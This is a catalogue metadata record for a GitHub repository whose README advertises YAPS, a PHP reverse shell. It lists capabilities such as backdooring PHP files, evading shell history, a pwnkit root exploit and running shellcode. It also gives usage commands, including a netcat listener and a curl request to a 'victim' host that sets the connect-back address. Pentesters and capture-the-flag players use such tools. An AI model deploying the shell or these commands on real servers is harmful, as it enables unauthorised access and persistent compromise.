{"id":13844943,"url":"https://github.com/Nickguitar/YAPS","last_synced_at":"2025-07-12T00:32:21.457Z","repository":{"id":41825059,"uuid":"383318033","full_name":"Nickguitar/YAPS","owner":"Nickguitar","description":"Yet Another PHP Shell - The most complete PHP reverse shell","archived":false,"fork":false,"pushed_at":"2022-02-14T01:46:03.000Z","size":270,"stargazers_count":81,"open_issues_count":0,"forks_count":9,"subscribers_count":5,"default_branch":"main","last_synced_at":"2024-08-05T17:43:27.865Z","etag":null,"topics":["backdoor","bugbounty","ctf-tools","cve-2021-4034","exploit","hacking","netcat","netcat-reverse","penetration-testing","pentest","pentest-script","pentest-tool","pentesting","php","rat","reverse-shell","reverse-tcp","web-shell","webhacking"],"latest_commit_sha":null,"homepage":"","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Nickguitar.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-07-06T02:37:07.000Z","updated_at":"2024-08-03T11:17:32.000Z","dependencies_parsed_at":"2022-08-11T18:40:14.836Z","dependency_job_id":null,"html_url":"https://github.com/Nickguitar/YAPS","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Nickguitar%2FYAPS","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Nickguitar%2FYAPS/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Nickguitar%2FYAPS/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Nickguitar%2FYAPS/manifests","owner_url":"https://repos.ecosyste
.ms/api/v1/hosts/GitHub/owners/Nickguitar","download_url":"https://codeload.github.com/Nickguitar/YAPS/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225772819,"owners_count":17521895,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","bugbounty","ctf-tools","cve-2021-4034","exploit","hacking","netcat","netcat-reverse","penetration-testing","pentest","pentest-script","pentest-tool","pentesting","php","rat","reverse-shell","reverse-tcp","web-shell","webhacking"],"created_at":"2024-08-04T17:03:03.929Z","updated_at":"2024-11-21T17:31:01.926Z","avatar_url":"https://github.com/Nickguitar.png","language":"PHP","funding_links":[],"categories":["PHP"],"sub_categories":[],"readme":"# YAPS - **Y**et **A**nother **P**HP **S**hell\n\n![image](https://user-images.githubusercontent.com/3837916/152913972-59b182f7-aa98-4b48-bb60-16dfdcc02fc3.png)\n\n\nYes, as the name reveals, this is yet another PHP reverse shell, one more among hundreds available out there, but with some advantages. It is a single PHP file containing all its functions and you can control it via a simple TCP listener (e.g. `nc -lp 1337`).\n\nIn the current version (1.5), its main functions support only linux systems, but i'm planning to make it work with Windows too.\n\nIt's currently in its first version and I haven't tested it much yet, and *there are still many things I intend to do and improve for the next versions (**it's not done yet!**)*, so please let me know if you've found any bugs or have some suggestion for feature or improvement. 
=)\n\n\n## Features\n* Single PHP file (no need to install packages, libs, or download tons of files)\n* Works with netcat, ncat, socat, multi/handler, almost any listener\n* Customizable password protection\n* No logs in .bash_history\n* Does some enumeration\n  * Network info (interfaces, iptables rules, active ports)\n  * User info\n  * List SUID and GUID files\n  * Search for SSH keys (public and private)\n  * List crontab\n  * List writable PHP files\n* Auto download LinPEAS, LinEnum or Linux Exploit Suggester\n* Write and run PHP code on remote host\n* Spawn an interactive reverse shell\n* Duplicate as many connections as you want\n* Auto update\n* Infect PHP files with backdoors\n* Auto reverse root shell via pwnkit (CVE-2021-4034)\n* **[NEW] Send and execute shellcode**\n\n## Cons\n* Connection isn't encrypted (yet) (nc does not support SSL)\n* Not fully interactive (although you can spawn an interactive shell with `!interactive`)\n  * CTRL+C breaks it; can't use arrows to navigate (unless you use `rlwrap nc -lp \u003cip\u003e \u003cport\u003e`)\n\n## Usage\n1. Set up a TCP listener;\n2. Set your IP and port. This can be done by:\n* 2.1 Editing the variables at the start of the script;\n* 2.2 Setting them via POST request (`curl -x POST -d \"x=ip:port\" victim.com/yaps.php`);\n3. Open yaps.php in a browser, curl it or run via CLI;\n* 3.1 You can set `yaps.php?s` or `yaps.php?silent` to suppress the banner\n* 3.2 You can run via CLI with `php yaps.php ip port`\n4. 
Hack!\n\n## Working commands\n* `!help - Display the help menu`\n* `!all-colors - Toggle all colors (compatible with colorless TTY)`\n* `!color - Toggle PS1 color (locally only, no environment variable is changed)`\n* `!duplicate - Spawn another YAPS connection`\n* `!enum - Download LinPEAS and LinEnum to /tmp and get them ready to use`\n* `!info - List information about the target (the enumeration I mentioned above)`\n* `!infect - Infect writable PHP files with backdoors`\n* `!interactive - Spawn interactive reverse shells on other ports (works w/ sudo, su, mysql, etc.)`\n* `!passwd - Password option (enable, disable, set, modify)`\n* `!php - Write and run PHP on the remote host`\n* `!pwnkit - Tries to exploit CVE-2021-4034 and spawn a root reverse shell`\n* `!shellcode - Send and run shellcode on the remote host`\n* `!suggester - Download Linux Exploit Suggester to /tmp and get it ready to use`\n\n## Screenshots\n\n\u003cdetails\u003e\n  \u003csummary\u003eClick to expand screenshots section\u003c/summary\u003e\n\n### Current commands:\n![commands](https://user-images.githubusercontent.com/3837916/153728054-82ab16ab-99b1-4113-863a-01f8fbeb6d04.png)\n\n### Doing some recon:\n![image](https://user-images.githubusercontent.com/3837916/127257433-778b1322-c82e-4857-897f-0f3f459dcb2b.png)\n\n### Root reverse shell through CVE-2021-4034\n![pwn](https://user-images.githubusercontent.com/3837916/152597200-267704b9-0d50-4bcd-a68f-3c8ea6c74c21.gif)\n \n### Sending and running shellcode!\n![shellcode](https://user-images.githubusercontent.com/3837916/153727126-a57c95a5-6447-4988-a57b-851b808df93e.gif)\n\n### Spawning an interactive shell\n![interactive](https://user-images.githubusercontent.com/3837916/153728966-ed70a9ff-29c4-435e-898f-6180df7ac048.gif)\n\n### Duplicating a YAPS session\n![duplicate](https://user-images.githubusercontent.com/3837916/153727468-dbbb6ef6-6461-4f2a-95dc-32940d797a39.gif)\n\n### Poisoning PHP 
files\n![infect](https://user-images.githubusercontent.com/3837916/127263363-e286357c-2be0-4890-8895-4bd5adadd3af.gif)\n\n### Writing remote PHP code\n![remotephp](https://user-images.githubusercontent.com/3837916/124774830-7dedab80-df14-11eb-9e84-c8d88b9f4de2.png)\n\n### Password protected shell\n![passprotected](https://user-images.githubusercontent.com/3837916/127260459-cc50203d-3ba6-408b-af0f-820756e9891d.png)\n\n\u003c/details\u003e\n\n\n## Changelog\n\n**v1.5 - 12/02/2022**\n- Added `!shellcode` to receive and run an arbitrary shellcode\n- Improved `duplicate()` function (you can now use a range of ports)\n- Changed function name from `stabilize` to `interactive`\n- Packed embedded codes to save space\n- Fixed broken links\n- Prepend \"TERM=xterm\" to all commands\n- Minor improvements\n\n**v1.4 - 04/02/2022**\n- Added `!pwnkit` to exploit CVE-2021-4034 and spawn a root reverse shell\n- Improved `verify_update()` function\n- Minor improvements\n\n**v1.3.1 - 01/08/2021**\n- Bugs fixed\n\n**v1.3 - 28/07/2021**\n- Added `!infect` to infect PHP files with backdoors\n- Changed `!stabilize` payload (bugs fixed)\n\n**v1.2.2 - 18/07/2021**\n- Changed 'update' function\n- Changed 'connect' function\n- Improved 'download' function\n- Bugs fixed\n\n**v1.2.1 - 17/07/2021**\n- Bugs fixed\n\n**v1.2 - 17/07/2021**\n- Added `!duplicate` to spawn another shell\n- Added update verification (`--update|-u`)\n- Added CLI arguments (`--help|-h`)\n- Added socket via arguments (`php yaps.php ip port`)\n- Changed stabilize shell method (doesn't freeze anymore)\n- Changed download method\n- Changed connection method via POST (receives a single parameter)\n\n**v1.1 - 12/07/2021**\n- Added `!all-colors` to toggle terminal colors and work with colorless TTYs\n- Added `exit` command to close socket (leave shell)\n- Changed payload in `!stabilize` to unset HISTSIZE and HISTFILE\n- Changed the method of obtaining CPU and meminfo in `!info`\n\n**v1.0.1 - 08/07/2021**\n- Changed `[x,y,z]` to 
`array(x,y,z)` to improve compatibility with older PHP versions\n- Changed payload for interactive shell to work with PHP\u003c5.4\n\n## Credits\nSome ideas were inspired by these tools:\n\n#### Linpeas\nhttps://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS\n\n#### Linenum\nhttps://github.com/rebootuser/LinEnum\n\n#### Suggester\nhttps://github.com/AonCyberLabs/Windows-Exploit-Suggester\n\n#### Pentest Monkey\nhttps://github.com/pentestmonkey/php-reverse-shell\n\n#### Arthepsy exploit for pwnkit\nhttps://github.com/arthepsy/CVE-2021-4034/\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FNickguitar%2FYAPS","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FNickguitar%2FYAPS","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FNickguitar%2FYAPS/lists"}